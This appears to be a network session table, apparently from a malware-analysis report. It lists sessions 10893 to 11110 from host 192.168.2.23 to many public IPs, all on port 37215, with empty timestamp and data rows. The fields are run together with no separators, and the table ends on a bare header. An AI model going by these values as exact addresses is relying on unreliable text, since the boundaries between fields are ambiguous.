                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10893192.168.2.2342782197.235.221.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10894192.168.2.2336922162.211.226.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10895192.168.2.2348754157.129.142.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10896192.168.2.2354454197.187.77.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10897192.168.2.2358934197.42.134.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10898192.168.2.235119058.38.199.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10899192.168.2.2337884197.165.240.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10900192.168.2.2360026212.123.236.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10901192.168.2.2352678157.84.37.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10902192.168.2.2357256197.231.218.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10903192.168.2.235495841.178.128.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10904192.168.2.234302441.8.161.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10905192.168.2.2353200157.87.168.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10906192.168.2.2347230197.133.35.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10907192.168.2.234007271.196.84.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10908192.168.2.234904041.242.161.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10909192.168.2.2348900197.206.17.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10910192.168.2.2347016157.37.236.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10911192.168.2.235233014.76.82.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10912192.168.2.2352204157.65.233.20637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10913192.168.2.2342920157.169.232.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10914192.168.2.2351802157.127.244.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10915192.168.2.2352462197.12.171.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10916192.168.2.2335036197.88.112.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10917192.168.2.2350900197.36.83.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10918192.168.2.233534841.158.98.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10919192.168.2.2354684197.152.44.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10920192.168.2.235560441.34.170.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10921192.168.2.2350118157.234.58.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10922192.168.2.236031079.219.30.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10923192.168.2.2347426197.19.22.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10924192.168.2.2356280157.211.27.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10925192.168.2.2348752197.81.57.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10926192.168.2.2342152124.118.182.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10927192.168.2.2356618197.3.147.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10928192.168.2.234316641.107.98.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10929192.168.2.2353602157.86.92.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10930192.168.2.2334388197.215.114.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10931192.168.2.2348096197.118.8.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10932192.168.2.235749841.234.153.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10933192.168.2.235205841.124.39.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10934192.168.2.233627091.47.239.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10935192.168.2.2352766157.185.220.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10936192.168.2.235218441.228.224.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10937192.168.2.2352418157.168.119.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10938192.168.2.235150841.134.96.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10939192.168.2.235810897.85.91.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10940192.168.2.2341594197.110.212.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10941192.168.2.2350224157.146.132.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10942192.168.2.235218641.171.76.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10943192.168.2.233716841.226.229.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10944192.168.2.234333441.49.66.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10945192.168.2.2347838137.241.63.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10946192.168.2.2356078119.82.48.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10947192.168.2.2342372140.163.186.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10948192.168.2.2346614121.103.204.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10949192.168.2.2338106157.199.185.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10950192.168.2.2349638157.118.47.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10951192.168.2.234015041.174.40.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10952192.168.2.2342084197.117.176.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10953192.168.2.2351710106.183.26.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10954192.168.2.2352312197.154.9.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10955192.168.2.2344386157.180.122.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10956192.168.2.2347326197.83.36.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10957192.168.2.2337286197.35.156.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10958192.168.2.2345836197.131.171.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10959192.168.2.2338944157.202.218.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10960192.168.2.2349794157.144.36.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10961192.168.2.2350758197.143.9.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10962192.168.2.235341654.168.144.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10963192.168.2.234880641.62.194.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10964192.168.2.2359916157.225.180.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10965192.168.2.2355482157.188.125.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10966192.168.2.2333496157.77.100.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10967192.168.2.2342536157.120.127.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10968192.168.2.234949641.206.248.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10969192.168.2.2350916147.60.57.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10970192.168.2.2353724197.248.91.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10971192.168.2.234548441.92.249.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10972192.168.2.2359804197.113.140.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10973192.168.2.2351826197.13.122.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10974192.168.2.2338646157.53.44.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10975192.168.2.2344992157.171.202.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10976192.168.2.235607441.98.221.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10977192.168.2.2343668197.160.135.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10978192.168.2.2344866197.55.32.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10979192.168.2.2355604160.35.208.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10980192.168.2.235393241.244.166.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10981192.168.2.2359464157.86.138.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10982192.168.2.2347522157.239.180.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10983192.168.2.236042441.124.207.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10984192.168.2.235526841.65.64.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10985192.168.2.2332794197.3.228.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10986192.168.2.233987037.58.79.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10987192.168.2.2334758130.200.161.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10988192.168.2.2353236157.148.85.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10989192.168.2.2350594157.47.16.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10990192.168.2.235565641.135.114.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10991192.168.2.235939841.128.80.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10992192.168.2.2347048197.255.11.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10993192.168.2.2336182157.87.87.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10994192.168.2.2337098170.124.118.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10995192.168.2.234243841.142.60.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10996192.168.2.2360356207.192.185.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10997192.168.2.2337642157.221.5.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10998192.168.2.234061641.12.21.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10999192.168.2.233557841.12.4.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11000192.168.2.2333746124.235.99.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11001192.168.2.233285287.237.88.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11002192.168.2.2359294197.113.252.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11003192.168.2.2338568197.45.214.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11004192.168.2.2356112197.204.255.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11005192.168.2.234987434.19.42.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11006192.168.2.2334748197.187.45.20537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11007192.168.2.2357884157.174.70.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11008192.168.2.2349300157.73.17.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11009192.168.2.235175841.202.147.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11010192.168.2.23437345.229.128.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11011192.168.2.234607247.229.224.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11012192.168.2.2348282157.122.203.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11013192.168.2.2354442218.163.111.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11014192.168.2.2357384197.146.137.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11015192.168.2.2346684157.43.100.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11016192.168.2.235805441.61.238.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11017192.168.2.2336126197.18.169.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11018192.168.2.233399636.26.43.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11019192.168.2.2358982197.91.155.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11020192.168.2.2338336197.136.212.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11021192.168.2.2352732135.89.33.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11022192.168.2.2342210182.69.199.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11023192.168.2.2355764197.52.117.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11024192.168.2.2343382157.64.145.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11025192.168.2.2346496197.66.62.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11026192.168.2.2350272129.246.53.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11027192.168.2.2353826103.216.154.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11028192.168.2.234951841.80.7.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11029192.168.2.2332796197.86.19.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11030192.168.2.2347484157.40.15.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11031192.168.2.2337532157.50.181.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11032192.168.2.2352208197.166.99.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11033192.168.2.2339098168.33.94.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11034192.168.2.2355256157.79.176.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11035192.168.2.2333690157.1.159.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11036192.168.2.234744041.139.207.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11037192.168.2.2354672157.179.23.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11038192.168.2.2360502157.57.163.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11039192.168.2.235796241.42.73.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11040192.168.2.2360254222.105.175.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11041192.168.2.234285092.16.225.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11042192.168.2.2343824157.84.38.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11043192.168.2.2352514197.174.105.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11044192.168.2.235703841.153.171.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11045192.168.2.2352918197.227.111.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11046192.168.2.235392641.131.79.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11047192.168.2.2352390157.133.123.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11048192.168.2.235450841.76.176.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11049192.168.2.235362641.252.216.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11050192.168.2.2358464157.212.177.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11051192.168.2.2356330157.83.97.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11052192.168.2.2347744157.12.158.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11053192.168.2.2349376197.219.251.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11054192.168.2.236038641.50.95.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11055192.168.2.233420241.94.252.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11056192.168.2.234897241.104.207.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11057192.168.2.235033424.101.200.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11058192.168.2.2356760205.77.91.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11059192.168.2.23431664.127.100.9437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11060192.168.2.2352712157.170.121.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11061192.168.2.234296441.128.108.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11062192.168.2.2343432163.161.169.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11063192.168.2.2342320211.45.242.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11064192.168.2.2355406157.70.180.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11065192.168.2.2355950161.99.37.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11066192.168.2.2342386157.87.36.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11067192.168.2.234440441.254.241.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11068192.168.2.234207041.87.79.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11069192.168.2.2353280157.74.153.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11070192.168.2.235657641.240.174.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11071192.168.2.2340622157.182.197.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11072192.168.2.2353498157.13.215.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11073192.168.2.2360624157.254.32.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11074192.168.2.234961241.20.223.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11075192.168.2.235480041.4.130.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11076192.168.2.2344372143.188.254.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11077192.168.2.2333300197.233.111.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11078192.168.2.2337650157.76.64.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11079192.168.2.233342641.167.215.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11080192.168.2.2349718157.252.156.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11081192.168.2.2347990157.91.186.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11082192.168.2.2353844157.174.8.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11083192.168.2.2333414157.176.74.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11084192.168.2.2353112157.58.167.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11085192.168.2.2357906112.129.219.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11086192.168.2.2345170197.193.236.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11087192.168.2.235722241.74.87.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11088192.168.2.2337056154.156.199.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11089192.168.2.2356444185.252.131.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11090192.168.2.233421040.186.218.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11091192.168.2.2358908157.59.118.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11092192.168.2.2356046157.2.149.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11093192.168.2.2351054157.45.101.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11094192.168.2.2357224197.140.7.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11095192.168.2.2342344165.255.10.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11096192.168.2.2343270197.86.126.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11097192.168.2.2354154197.148.106.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11098192.168.2.2355820157.4.2.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11099192.168.2.2343640157.147.228.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11100192.168.2.235919441.230.89.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11101192.168.2.2334776184.155.64.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11102192.168.2.2357590129.85.59.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11103192.168.2.234293041.255.12.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11104192.168.2.2359618157.170.171.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11105192.168.2.2359226157.52.232.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11106192.168.2.2339028201.194.26.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11107192.168.2.233911295.70.239.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11108192.168.2.2334742157.220.149.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11109192.168.2.2354916197.14.52.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11110192.168.2.2349784157.204.72.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
